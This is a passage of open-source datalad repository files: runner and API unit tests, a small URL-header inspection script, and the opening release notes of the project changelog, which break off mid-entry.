result_pool: dict[str, bool]) -> None:\n super().__init__()\n self.state = 0\n self.result_pool = result_pool\n\n def connection_made(self, process: subprocess.Popen) -> None:\n super().connection_made(process)\n assert self.process is not None\n assert self.process.stdin is not None\n os.write(self.process.stdin.fileno(), b\"1 + 1\\n\")\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n self.result_pool[\"connection_lost_called\"] = True\n\n def process_exited(self) -> None:\n self.result_pool[\"process_exited_called\"] = True\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n super().pipe_data_received(fd, data)\n assert self.process is not None\n assert self.process.stdin is not None\n if self.state == 0:\n self.state += 1\n os.write(self.process.stdin.fileno(), b\"2 ** 3\\n\")\n if self.state == 1:\n self.state += 1\n os.write(self.process.stdin.fileno(), b\"exit(0)\\n\")\n\n result_pool: dict[str, bool] = dict()\n result = run_command([sys.executable, \"-i\"],\n BidirectionalProtocol,\n stdin=subprocess.PIPE,\n protocol_kwargs={\n \"result_pool\": result_pool\n })\n\n assert isinstance(result, dict)\n lines = [line.strip() for line in result[\"stdout\"].splitlines()]\n eq_(lines, [\"2\", \"8\"])\n assert_true(result_pool[\"connection_lost_called\"], True)\n assert_true(result_pool[\"process_exited_called\"], True)\n\n\ndef test_blocking_thread_exit() -> None:\n read_queue: Queue[tuple[Any, IOState, bytes]] = queue.Queue()\n\n (read_descriptor, write_descriptor) = os.pipe()\n read_file = os.fdopen(read_descriptor, \"rb\")\n read_thread = ReadThread(\n identifier=\"test thread\",\n user_info=read_descriptor,\n source=read_file,\n destination_queue=read_queue,\n signal_queues=[]\n )\n read_thread.start()\n\n os.write(write_descriptor, b\"some data\")\n assert_true(read_thread.is_alive())\n identifier, state, data = read_queue.get()\n eq_(data, b\"some data\")\n\n read_thread.request_exit()\n\n # Check the blocking part\n sleep(.3)\n assert_true(read_thread.is_alive())\n\n # Check actual exit, we will not get\n # \"more data\" when exit was requested,\n # because the thread will not attempt\n # a write\n os.write(write_descriptor, b\"more data\")\n read_thread.join()\n print(read_queue.queue)\n assert_true(read_queue.empty())\n\n\ndef test_blocking_read_exception_catching() -> None:\n read_queue: Queue[tuple[Any, IOState, Any]] = queue.Queue()\n\n (read_descriptor, write_descriptor) = os.pipe()\n read_file = os.fdopen(read_descriptor, \"rb\")\n read_thread = ReadThread(\n identifier=\"test thread\",\n user_info=read_descriptor,\n source=read_file,\n destination_queue=read_queue,\n signal_queues=[read_queue]\n )\n read_thread.start()\n\n os.write(write_descriptor, b\"some data\")\n assert_true(read_thread.is_alive())\n identifier, state, data = read_queue.get()\n eq_(data, b\"some data\")\n os.close(write_descriptor)\n read_thread.join()\n identifier, state, data = read_queue.get()\n eq_(data, None)\n\n\ndef test_blocking_read_closing() -> None:\n # Expect that a reader thread exits when os.read throws an error.\n fake_file = MagicMock(**{\"fileno.return_value\": -1, \"close.return_value\": None})\n\n def fake_read(*args: Any) -> None:\n raise ValueError(\"test exception\")\n\n read_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue()\n destination_queue: Queue[tuple[Any, IOState, bytes]] = queue.Queue()\n with patch(\"datalad.runner.runnerthreads.os.read\") as read:\n read.side_effect = fake_read\n\n read_thread = ReadThread(\n 
identifier=\"test thread\",\n user_info=None,\n source=fake_file,\n destination_queue=destination_queue,\n signal_queues=[read_queue])\n\n read_thread.start()\n read_thread.join()\n\n identifier, state, data = read_queue.get()\n eq_(data, None)\n\n\ndef test_blocking_write_exception_catching() -> None:\n # Expect that a blocking writer catches exceptions and exits gracefully.\n\n write_queue: Queue[Optional[bytes]] = queue.Queue()\n signal_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue()\n\n (read_descriptor, write_descriptor) = os.pipe()\n write_file = os.fdopen(write_descriptor, \"rb\")\n write_thread = WriteThread(\n identifier=\"test thread\",\n user_info=write_descriptor,\n source_queue=write_queue,\n destination=write_file,\n signal_queues=[signal_queue]\n )\n write_thread.start()\n\n write_queue.put(b\"some data\")\n data = os.read(read_descriptor, 1024)\n eq_(data, b\"some data\")\n\n os.close(read_descriptor)\n os.close(write_descriptor)\n\n write_queue.put(b\"more data\")\n write_thread.join()\n eq_(signal_queue.get(), (write_descriptor, IOState.ok, None))\n\n\ndef test_blocking_writer_closing() -> None:\n # Expect that a blocking writer closes its file when `None` is sent to it.\n write_queue: Queue[Optional[bytes]] = queue.Queue()\n signal_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue()\n\n (read_descriptor, write_descriptor) = os.pipe()\n write_file = os.fdopen(write_descriptor, \"rb\")\n write_thread = WriteThread(\n identifier=\"test thread\",\n user_info=write_descriptor,\n source_queue=write_queue,\n destination=write_file,\n signal_queues=[signal_queue]\n )\n write_thread.start()\n\n write_queue.put(b\"some data\")\n data = os.read(read_descriptor, 1024)\n eq_(data, b\"some data\")\n\n write_queue.put(None)\n write_thread.join()\n eq_(signal_queue.get(), (write_descriptor, IOState.ok, None))\n\n\ndef test_blocking_writer_closing_timeout_signal() -> None:\n # Expect that writer or reader do not block forever on a full signal queue\n\n write_queue: Queue[Optional[bytes]] = queue.Queue()\n signal_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue(1)\n signal_queue.put((\"This is data\", IOState.ok, None))\n\n (read_descriptor, write_descriptor) = os.pipe()\n write_file = os.fdopen(write_descriptor, \"rb\")\n write_thread = WriteThread(\n identifier=\"test thread\",\n user_info=write_descriptor,\n source_queue=write_queue,\n destination=write_file,\n signal_queues=[signal_queue]\n )\n write_thread.start()\n\n write_queue.put(b\"some data\")\n data = os.read(read_descriptor, 1024)\n eq_(data, b\"some data\")\n\n write_queue.put(None)\n write_thread.join()\n eq_(signal_queue.get(), (\"This is data\", IOState.ok, None))\n\n\ndef test_blocking_writer_closing_no_signal() -> None:\n # Expect that writer or reader do not block forever on a full signal queue\n\n write_queue: Queue[Optional[bytes]] = queue.Queue()\n signal_queue: Queue[tuple[Any, IOState, Optional[bytes]]] = queue.Queue(1)\n signal_queue.put((\"This is data\", IOState.ok, None))\n\n (read_descriptor, write_descriptor) = os.pipe()\n write_file = os.fdopen(write_descriptor, \"rb\")\n write_thread = WriteThread(\n identifier=\"test thread\",\n user_info=write_descriptor,\n source_queue=write_queue,\n destination=write_file,\n signal_queues=[signal_queue]\n )\n write_thread.start()\n\n write_queue.put(b\"some data\")\n data = os.read(read_descriptor, 1024)\n eq_(data, b\"some data\")\n\n write_queue.put(None)\n write_thread.join()\n\n\ndef test_inside_async() -> None:\n 
async def main() -> dict:\n runner = Runner()\n res = runner.run(\n ([\"cmd.exe\", \"/c\"] if on_windows else []) + [\"echo\", \"abc\"],\n StdOutCapture)\n assert isinstance(res, dict)\n return res\n\n result = asyncio.run(main())\n eq_(result[\"stdout\"], \"abc\" + os.linesep)\n\n\n# Both Windows and OSX suffer from wrapt's object proxy insufficiency\n# NotImplementedError: object proxy must define __reduce_ex__()\n@known_failure_osx\n@known_failure_windows\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_popen_invocation(src_path: str = \"\", dest_path: str = \"\") -> None:\n # https://github.com/ReproNim/testkraken/issues/93\n from multiprocessing import Process\n\n from datalad.api import clone # type: ignore[attr-defined]\n from datalad.distribution.dataset import Dataset\n\n src = Dataset(src_path).create()\n (src.pathobj / \"file.dat\").write_bytes(b\"\\000\")\n src.save(message=\"got data\")\n\n dest = clone(source=src_path, path=dest_path)\n fetching_data = Process(target=dest.get, kwargs={\"path\": 'file.dat'})\n fetching_data.start()\n fetching_data.join(5.0)\n assert_false(fetching_data.is_alive(), \"Child is stuck!\")\n\n\ndef test_timeout() -> None:\n # Expect timeout protocol calls on long running process\n # if the specified timeout is short enough\n class TestProtocol(StdOutErrCapture):\n\n received_timeouts: list[tuple[int, Optional[int]]] = []\n\n def __init__(self) -> None:\n StdOutErrCapture.__init__(self)\n self.counter = count()\n\n def timeout(self, fd: Optional[int]) -> bool:\n TestProtocol.received_timeouts.append((next(self.counter), fd))\n return False\n\n run_command(\n [\"waitfor\", \"/T\", \"1\", \"TheComputerTurnsIntoATulip\"]\n if on_windows\n else [\"sleep\", \"1\"],\n stdin=None,\n protocol=TestProtocol,\n timeout=.1\n )\n assert_true(len(TestProtocol.received_timeouts) > 0)\n assert_true(all(map(lambda e: e[1] in (1, 2, None), TestProtocol.received_timeouts)))\n\n\ndef test_timeout_nothing() -> None:\n # Expect timeout protocol calls for the process on long running processes,\n # if the specified timeout is short enough.\n class TestProtocol(NoCapture):\n def __init__(self,\n timeout_queue: list[Optional[int]]) -> None:\n NoCapture.__init__(self)\n self.timeout_queue = timeout_queue\n self.counter = count()\n\n def timeout(self, fd: Optional[int]) -> bool:\n self.timeout_queue.append(fd)\n return False\n\n stdin_queue: Queue[Optional[bytes]] = queue.Queue()\n for i in range(12):\n stdin_queue.put(b\"\\x00\" * 1024)\n stdin_queue.put(None)\n\n timeout_queue: list[Optional[int]] = []\n run_command(\n py2cmd(\"import time; time.sleep(.4)\\n\"),\n stdin=stdin_queue,\n protocol=TestProtocol,\n timeout=.1,\n protocol_kwargs=dict(timeout_queue=timeout_queue)\n )\n # Ensure that we have only process timeouts and at least one\n assert_true(all(map(lambda e: e is None, timeout_queue)))\n assert_true(len(timeout_queue) > 0)\n\n\ndef test_timeout_stdout_stderr() -> None:\n # Expect timeouts on stdin, stdout, stderr, and the process\n class TestProtocol(StdOutErrCapture):\n def __init__(self,\n timeout_queue: list[tuple[int, Optional[int]]]) -> None:\n StdOutErrCapture.__init__(self)\n self.timeout_queue = timeout_queue\n self.counter = count()\n\n def timeout(self, fd: Optional[int]) -> bool:\n self.timeout_queue.append((next(self.counter), fd))\n return False\n\n stdin_queue: Queue[Optional[bytes]] = queue.Queue()\n for i in range(12):\n stdin_queue.put(b\"\\x00\" * 1024)\n stdin_queue.put(None)\n\n timeout_queue: list[tuple[int, Optional[int]]] = []\n 
run_command(\n py2cmd(\"import time;time.sleep(.5)\\n\"),\n stdin=stdin_queue,\n protocol=TestProtocol,\n timeout=.1,\n protocol_kwargs=dict(timeout_queue=timeout_queue)\n )\n\n # Expect at least one timeout for stdout and stderr.\n # there might be more.\n sources = (1, 2)\n assert_true(len(timeout_queue) >= len(sources))\n for source in sources:\n assert_true(any(fd == source for _, fd in timeout_queue))\n\n\ndef test_timeout_process() -> None:\n # Expect timeouts on stdin, stdout, stderr, and the process\n class TestProtocol(StdOutErrCapture):\n def __init__(self,\n timeout_queue: list[tuple[int, Optional[int]]]) -> None:\n StdOutErrCapture.__init__(self)\n self.timeout_queue = timeout_queue\n self.counter = count()\n\n def timeout(self, fd: Optional[int]) -> bool:\n self.timeout_queue.append((next(self.counter), fd))\n return False\n\n stdin_queue: Queue[Optional[bytes]] = queue.Queue()\n for i in range(12):\n stdin_queue.put(b\"\\x00\" * 1024)\n stdin_queue.put(None)\n\n timeout_queue: list[tuple[int, Optional[int]]] = []\n run_command(\n py2cmd(\"import time;time.sleep(.5)\\n\"),\n stdin=stdin_queue,\n protocol=TestProtocol,\n timeout=.1,\n protocol_kwargs=dict(timeout_queue=timeout_queue)\n )\n\n # Expect at least one timeout for stdout and stderr.\n # there might be more.\n sources = (1, 2)\n assert_true(len(timeout_queue) >= len(sources))\n for source in sources:\n assert_true(any(fd == source for _, fd in timeout_queue))\n\n\ndef test_exit_3() -> None:\n # Expect the process to be closed after\n # the generator exits.\n rt = ThreadedRunner(cmd=[\"sleep\", \"4\"],\n stdin=None,\n protocol_class=GenStdoutStderr,\n timeout=.5,\n exception_on_error=False)\n tuple(rt.run())\n assert_true(rt.return_code is not None)\n\n\ndef test_exit_4() -> None:\n rt = ThreadedRunner(cmd=[\"sleep\", \"4\"],\n stdin=None,\n protocol_class=GenNothing,\n timeout=.5)\n tuple(rt.run())\n assert_true(rt.return_code is not None)\n\n\ndef test_generator_throw() -> None:\n rt = ThreadedRunner(cmd=[\"sleep\", \"4\"],\n stdin=None,\n protocol_class=GenNothing,\n timeout=.5)\n gen = rt.run()\n assert isinstance(gen, Generator)\n assert_raises(ValueError, gen.throw, ValueError, ValueError(\"abcdefg\"))\n\n\ndef test_exiting_process() -> None:\n result = run_command(py2cmd(\"import time\\ntime.sleep(3)\\nprint('exit')\"),\n protocol=NoCapture,\n stdin=None)\n assert isinstance(result, dict)\n eq_(result[\"code\"], 0)\n\n\ndef test_stalling_detection_1() -> None:\n runner = ThreadedRunner(\"something\", StdOutErrCapture, None)\n runner.stdout_enqueueing_thread = None\n runner.stderr_enqueueing_thread = None\n runner.process_waiting_thread = None\n with patch(\"datalad.runner.nonasyncrunner.lgr\") as logger:\n runner.process_queue()\n eq_(logger.method_calls[0][0], \"warning\")\n eq_(logger.method_calls[0][1][0], \"ThreadedRunner.process_queue(): stall detected\")\n\n\ndef test_stalling_detection_2() -> None:\n thread_mock = MagicMock()\n thread_mock.is_alive.return_value = False\n runner = ThreadedRunner(\"something\", StdOutErrCapture, None)\n runner.stdout_enqueueing_thread = thread_mock\n runner.stderr_enqueueing_thread = thread_mock\n runner.process_waiting_thread = thread_mock\n with patch(\"datalad.runner.nonasyncrunner.lgr\") as logger:\n runner.process_queue()\n eq_(logger.method_calls[0][0], \"warning\")\n eq_(logger.method_calls[0][1][0], \"ThreadedRunner.process_queue(): stall detected\")\n\n\ndef test_concurrent_waiting_run() -> None:\n from threading import Thread\n\n threaded_runner = 
ThreadedRunner(\n py2cmd(\"import time; time.sleep(1)\"),\n protocol_class=NoCapture,\n stdin=None,\n )\n\n start = time.time()\n\n number_of_threads = 5\n caller_threads = []\n for c in range(number_of_threads):\n caller_thread = Thread(target=threaded_runner.run)\n caller_thread.start()\n caller_threads.append(caller_thread)\n\n while caller_threads:\n t = caller_threads.pop()\n t.join()\n\n # If the threads are serialized, the duration should at least\n # be one second per thread.\n duration = time.time() - start\n assert duration >= 1.0 * number_of_threads\n\n\ndef test_concurrent_generator_reading() -> None:\n number_of_lines = 40\n number_of_threads = 100\n output_queue: Queue[tuple[int, Optional[str]]] = Queue()\n\n threaded_runner = ThreadedRunner(\n py2cmd(f\"for i in range({number_of_lines}): print(f'result#{{i}}')\"),\n protocol_class=GenStdoutLines,\n stdin=None,\n )\n result_generator = threaded_runner.run()\n\n def thread_main(thread_number: int, result_generator: Iterator[str], output_queue: Queue[tuple[int, Optional[str]]]) -> None:\n while True:\n try:\n output = next(result_generator)\n except StopIteration:\n output_queue.put((thread_number, None))\n break\n output_queue.put((thread_number, output))\n\n caller_threads = []\n for c in range(number_of_threads):\n caller_thread = Thread(\n target=thread_main,\n args=(c, result_generator, output_queue)\n )\n caller_thread.start()\n caller_threads.append(caller_thread)\n\n while caller_threads:\n t = caller_threads.pop()\n t.join()\n\n collected_outputs = [\n output_tuple[1]\n for output_tuple in output_queue.queue\n if output_tuple[1] is not None\n ]\n assert len(collected_outputs) == number_of_lines\n assert collected_outputs == [\n f\"result#{i}\"\n for i in range(number_of_lines)\n ]\n\n\ndef test_same_thread_reenter_detection() -> None:\n threaded_runner = ThreadedRunner(\n py2cmd(f\"print('hello')\"),\n protocol_class=GenStdoutLines,\n stdin=None,\n )\n threaded_runner.run()\n with pytest.raises(RuntimeError) as error:\n threaded_runner.run()\n assert \"re-entered by already\" in str(error.value)\n\n\ndef test_reenter_generator_detection() -> None:\n threaded_runner = ThreadedRunner(\n py2cmd(f\"print('hello')\"),\n protocol_class=GenStdoutLines,\n stdin=None,\n )\n\n def target(threaded_runner: ThreadedRunner, output_queue: Queue[tuple[str, float | BaseException]]) -> None:\n try:\n start_time = time.time()\n tuple(threaded_runner.run())\n output_queue.put((\"result\", time.time() - start_time))\n except RuntimeError as exc:\n output_queue.put((\"exception\", exc))\n\n output_queue: Queue[tuple[str, float | BaseException]] = Queue()\n\n for sleep_time in range(1, 4):\n other_thread = Thread(\n target=target,\n args=(threaded_runner, output_queue)\n )\n\n gen = threaded_runner.run()\n other_thread.start()\n time.sleep(sleep_time)\n tuple(gen)\n other_thread.join()\n\n assert len(list(output_queue.queue)) == 1\n result_type, value = output_queue.get()\n assert result_type == \"result\"\n assert isinstance(value, float)\n assert value >= sleep_time\n" }, { "alpha_fraction": 0.61948162317276, "alphanum_fraction": 0.630304753780365, "avg_line_length": 38, "blob_id": "e3095c07fc34b2abf44ef473d4b482fc4d3c5cfd", "content_id": "97ad01ea64a0a66e7eb2ad4125763713e2d59546", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3511, "license_type": "permissive", "max_line_length": 111, "num_lines": 90, "path": "/tools/urlinfo", "repo_name": 
"datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n#emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n#------------------------- =+- Python script -+= -------------------------\n\"\"\"\n Yaroslav Halchenko Dartmouth\n web: http://www.onerussian.com College\n e-mail: [email protected] ICQ#: 60653192\n\n DESCRIPTION (NOTES):\n\n COPYRIGHT: Yaroslav Halchenko 2013\n\n LICENSE: MIT\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in\n all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n THE SOFTWARE.\n\"\"\"\n#-----------------\\____________________________________/------------------\n\n__author__ = 'Yaroslav Halchenko'\n__copyright__ = 'Copyright (c) 2013 Yaroslav Halchenko'\n__license__ = 'MIT'\n\nimport argparse\nimport re, os, sys, urllib2\n\nfrom urlparse import urlsplit\n\ndef main(cmdline=None):\n args = make_parser().parse_args(cmdline)\n\n for url in args.urls:\n if args.print_filename:\n print(get_filename(url))\n else:\n response = get_url(url)\n # by default just dump all the information\n print(\"URL: \", url)\n if url != response.url:\n print(\"REDIRECTED URL: \", response.url)\n print(response.info())\n\ndef make_parser():\n parser = argparse.ArgumentParser('%prog: little tool to help gather information about URL(s)')\n parser.add_argument('urls', nargs='*', help='URLs')\n parser.add_argument('-f', '--print-filename', action='store_true',\n help='just print a content-disposition filename if present.'\n ' Otherwise the trailing portion of the URL')\n return parser\n\ndef get_filename(url):\n response = get_url(url)\n info = response.info()\n if info.has_key('Content-Disposition'):\n res = re.match('.* filename=\"(.*)\"', info['Content-Disposition'])\n return res.groups()[0]\n else:\n return os.path.basename(urllib2.unquote(urlsplit(response.url).path))\n\ndef test_get_filename():\n assert(get_filename('http://human.brain-map.org/api/v2/well_known_file_download/157722290') == 'T1.nii.gz')\n assert(get_filename('https://raw.githubusercontent.com/datalad/datalad/master/README.md') == 'README.md')\n\n\ndef get_url(url):\n request = urllib2.Request(url)\n request.add_header('Accept-encoding', 'gzip,deflate')\n response = urllib2.urlopen(request)\n return response\n\nif __name__ == '__main__':\n # for some reason nose refused to load tests even with --exe\n # test_get_filename()\n sys.exit(main())\n\n" }, { "alpha_fraction": 0.5988112688064575, "alphanum_fraction": 0.6011887192726135, "avg_line_length": 37.67816162109375, "blob_id": 
"f69c6d47f7c77516a1f3c15142a8433aadc3407e", "content_id": "a4fbff3ab40665f5c99a69df8b1f23f590e8db66", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3365, "license_type": "permissive", "max_line_length": 99, "num_lines": 87, "path": "/datalad/tests/test_api.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n'''Unit tests for Python API functionality.'''\n\nimport re\n\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_false,\n assert_in,\n assert_true,\n eq_,\n)\nfrom datalad.utils import get_sig_param_names\n\n\ndef test_basic_setup():\n # the import alone will verify that all default values match their\n # constraints\n from datalad import api\n\n # random pick of something that should be there\n assert_true(hasattr(api, 'install'))\n assert_true(hasattr(api, 'create'))\n # make sure all helper utilities do not pollute the namespace\n # and we end up only with __...__ attributes\n assert_false(list(filter(lambda s: s.startswith('_') and not re.match('__.*__', s), dir(api))))\n\n assert_in('Parameters', api.Dataset.install.__doc__)\n assert_in('Parameters', api.Dataset.create.__doc__)\n\n\ndef _test_consistent_order_of_args(intf, spec_posargs):\n f = getattr(intf, '__call__')\n args, kw_only = get_sig_param_names(f, ('pos_any', 'kw_only'))\n # now verify that those spec_posargs are first among args\n # TODO*: The last odd one left from \"plugins\" era. 
Decided to leave alone\n if intf.__name__ in ('ExtractMetadata',):\n return\n\n # if we had used * to instruct to have keyword only args, then all\n # args should actually be matched entirely\n if kw_only:\n # \"special cases/exclusions\"\n if intf.__name__ == 'CreateSiblingRia':\n # -s|--name is a mandatory option (for uniformity), so allowed to be used as posarg #2\n eq_(set(args), spec_posargs.union({'name'}))\n else:\n eq_(set(args), spec_posargs)\n else:\n # and if no kw_only -- only those which are known to be positional\n eq_(set(args[:len(spec_posargs)]), spec_posargs)\n if spec_posargs:\n # and really -- we should not even get here if there are some spec_posargs --\n # new interfaces should use * to separate pos args from kwargs per our now\n # accepted design doc:\n # http://docs.datalad.org/en/latest/design/pos_vs_kw_parameters.html\n assert False\n\n\n# TODO?: make parametric again instead of invoking\ndef test_consistent_order_of_args():\n from importlib import import_module\n\n from datalad.interface.base import get_interface_groups\n\n for grp_name, grp_descr, interfaces in get_interface_groups():\n for intfspec in interfaces:\n # turn the interface spec into an instance\n mod = import_module(intfspec[0], package='datalad')\n intf = getattr(mod, intfspec[1])\n spec = getattr(intf, '_params_', dict())\n\n # figure out which of the specs are \"positional\"\n spec_posargs = {\n name\n for name, param in spec.items()\n if param.cmd_args and not param.cmd_args[0].startswith('-')\n }\n # we have information about positional args\n _test_consistent_order_of_args(intf, spec_posargs)\n" }, { "alpha_fraction": 0.6810613870620728, "alphanum_fraction": 0.7316411137580872, "avg_line_length": 53.3068733215332, "blob_id": "a2bfa7374ef1a57a5883d563828b9e3ca937523a", "content_id": "93025041e6198b2b813aed3fdc58d0286ef6e864", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 300660, "license_type": "permissive", "max_line_length": 1057, "num_lines": 5530, "path": "/CHANGELOG.md", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\n<a id='changelog-0.19.3'></a>\n# 0.19.3 (2023-08-10)\n\n## 🐛 Bug Fixes\n\n- Type annotate get_status_dict and note that we can pass Exception or CapturedException which is not subclass. [PR #7403](https://github.com/datalad/datalad/pull/7403) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- BF: create-sibling-gitlab used to raise a TypeError when attempting a recursive operation in a dataset with uninstalled subdatasets. It now raises an impossible result instead. [PR #7430](https://github.com/datalad/datalad/pull/7430) (by [@adswa](https://github.com/adswa))\n\n- Pass branch option into recursive call within Install - for the cases whenever install is invoked with URL(s). Fixes [#7461](https://github.com/datalad/datalad/issues/7461) via [PR #7463](https://github.com/datalad/datalad/pull/7463) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Allow for reckless=ephemeral clone using relative path for the original location. 
Fixes [#7469](https://github.com/datalad/datalad/issues/7469) via [PR #7472](https://github.com/datalad/datalad/pull/7472) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 📝 Documentation\n\n- Fix a property name and default costs described in \"getting subdatasets\" section of `get` documentation.\n Fixes [#7458](https://github.com/datalad/datalad/issues/7458) via\n [PR #7460](https://github.com/datalad/datalad/pull/7460)\n (by [@mslw](https://github.com/mslw))\n\n## 🏠 Internal\n\n- Copy an adjusted environment only if requested to do so.\n [PR #7399](https://github.com/datalad/datalad/pull/7399)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Eliminate uses of `pkg_resources`. Fixes [#7435](https://github.com/datalad/datalad/issues/7435) via [PR #7439](https://github.com/datalad/datalad/pull/7439) (by [@jwodder](https://github.com/jwodder))\n\n## 🧪 Tests\n\n- Disable some S3 tests of their VCR taping where they fail for known issues. [PR #7467](https://github.com/datalad/datalad/pull/7467) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.19.2'></a>\n# 0.19.2 (2023-07-03)\n\n## 🐛 Bug Fixes\n\n- Remove surrounding quotes in output filenames even for newer version of annex. Fixes [#7440](https://github.com/datalad/datalad/issues/7440) via [PR #7443](https://github.com/datalad/datalad/pull/7443) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 📝 Documentation\n\n- DOC: clarify description of the \"install\" interface to reflect its convoluted behavior. [PR #7445](https://github.com/datalad/datalad/pull/7445) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.19.1'></a>\n# 0.19.1 (2023-06-26)\n\n## 🏠 Internal\n\n- Make compatible with upcoming release of git-annex (next after 10.20230407) and pass explicit core.quotepath=false to all git calls. Also added `tools/find-hanged-tests` helper.\n [PR #7372](https://github.com/datalad/datalad/pull/7372)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Adjust tests for upcoming release of git-annex (next after 10.20230407) and ignore DeprecationWarning for pkg_resources for now.\n [PR #7372](https://github.com/datalad/datalad/pull/7372)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.19.0'></a>\n# 0.19.0 (2023-06-14)\n\n## 🚀 Enhancements and New Features\n\n- Address gitlab API special character restrictions. [PR #7407](https://github.com/datalad/datalad/pull/7407) (by [@jsheunis](https://github.com/jsheunis))\n\n- BF: The default layout of create-sibling-gitlab is now ``collection``. The previous default, ``hierarchy`` has been removed as it failed in --recursive mode in different edgecases. For single-level datasets, the outcome of ``collection`` and ``hierarchy`` is identical. [PR #7410](https://github.com/datalad/datalad/pull/7410) (by [@jsheunis](https://github.com/jsheunis) and [@adswa](https://github.com/adswa))\n\n## 🐛 Bug Fixes\n\n- WTF - bring back and extend information on metadata extractors etc, and allow for sections to have subsections and be selected at both levels [PR #7309](https://github.com/datalad/datalad/pull/7309) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- BF: Run an actual git invocation with interactive commit config. 
[PR #7398](https://github.com/datalad/datalad/pull/7398) (by [@adswa](https://github.com/adswa))\n\n## 🔩 Dependencies\n\n- Raise minimal version of tqdm (progress bars) to v.4.32.0\n [PR #7330](https://github.com/datalad/datalad/pull/7330)\n (by [@mslw](https://github.com/mslw))\n\n## 📝 Documentation\n\n- DOC: Add a \"User messaging\" design doc. [PR #7310](https://github.com/datalad/datalad/pull/7310) (by [@jsheunis](https://github.com/jsheunis))\n\n## 🧪 Tests\n\n- Remove nose-based testing utils and possibility to test extensions using nose. [PR #7261](https://github.com/datalad/datalad/pull/7261) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.18.5'></a>\n# 0.18.5 (2023-06-13)\n\n## 🐛 Bug Fixes\n\n- More correct summary reporting for relaxed (no size) --annex. [PR #7050](https://github.com/datalad/datalad/pull/7050) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- ENH: minor tune up of addurls to be more tolerant and \"informative\". [PR #7388](https://github.com/datalad/datalad/pull/7388) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Ensure that data generated by timeout handlers in the asynchronous\n runner are accessible via the result generator, even if no other\n other events occur.\n [PR #7390](https://github.com/datalad/datalad/pull/7390)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Do not map (leave as is) trailing / or \\ in github URLs. [PR #7418](https://github.com/datalad/datalad/pull/7418) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 📝 Documentation\n\n- Use `sphinx_autodoc_typehints`. Fixes [#7404](https://github.com/datalad/datalad/issues/7404) via [PR #7412](https://github.com/datalad/datalad/pull/7412) (by [@jwodder](https://github.com/jwodder))\n\n## 🏠 Internal\n\n- Discontinue ConfigManager abuse for Git identity warning. [PR #7378](https://github.com/datalad/datalad/pull/7378) (by [@mih](https://github.com/mih)) and [PR #7392](https://github.com/datalad/datalad/pull/7392) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Boost python to 3.8 during extensions testing. [PR #7413](https://github.com/datalad/datalad/pull/7413) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Skip test_system_ssh_version if no ssh found + split parsing into separate test. [PR #7422](https://github.com/datalad/datalad/pull/7422) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.18.4'></a>\n# 0.18.4 (2023-05-16)\n\n## 🐛 Bug Fixes\n\n- Provider config files were ignored, when CWD changed between different datasets during runtime.\n Fixes [#7347](https://github.com/datalad/datalad/issues/7347) via\n [PR #7357](https://github.com/datalad/datalad/pull/7357)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 📝 Documentation\n\n- Added a 